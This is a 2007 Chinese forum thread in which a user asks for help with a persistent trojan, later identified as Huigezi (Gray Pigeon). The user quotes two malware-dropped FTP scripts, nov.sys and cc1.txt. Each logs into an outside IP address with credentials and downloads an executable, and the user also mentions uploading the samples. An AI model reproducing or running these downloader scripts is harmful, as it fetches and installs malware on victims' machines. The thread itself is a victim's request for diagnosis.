1   1  /  1  页   跳转

顽强的小毒(瑞星正版用户)

顽强的小毒(瑞星正版用户)

以前的苦恼就不说了
N次折腾后,重做了新系统
昨天晚上打好补丁,OK
但刚刚突然,防火墙提示 自动认证了ftp.exe (大概是这个意思)
系统 CPU 100%
查了会后发现C:\WINDOWS\system32 多了点东西
打开 多出的 nov.sys  居然是

open 125.65.111.79
new
123
get 804860942.exe cyu.exe
bye
 
找到了 cyu.exe 但没找到804860942.exe
传上了,有高手帮我诊断诊断

-----ps 事发后我把 ftp.exe cmd.exe禁止掉了,不知道有用没

[用户系统信息]Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)

附件附件:

下载次数:127
文件类型:application/octet-stream
文件大小:
上传时间:2007-11-29 18:43:06
描述:

最后编辑2007-12-16 11:38:04
分享到:
gototop
 

有高手吗?
gototop
 

今天又有了新东西
同样在 C:\WINDOWS\system32 下
多出了 cc1.txt
 内容如下

open 59.52.29.229
admin
syw
binary
get g.exe
bye

在C盘根目录下多了个 8.exe
打包传上

附件附件:

下载次数:221
文件类型:application/octet-stream
文件大小:
上传时间:2007-11-30 9:03:59
描述:

gototop
 

已经是最新的08版杀毒+防火墙
安全模式正常模式全试了
gototop
 

使用windows清理 发现是
G-server
灰鸽子木马及其变种

但其没杀掉
正在考虑如何彻底清理中...

感谢 农村阿哥
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT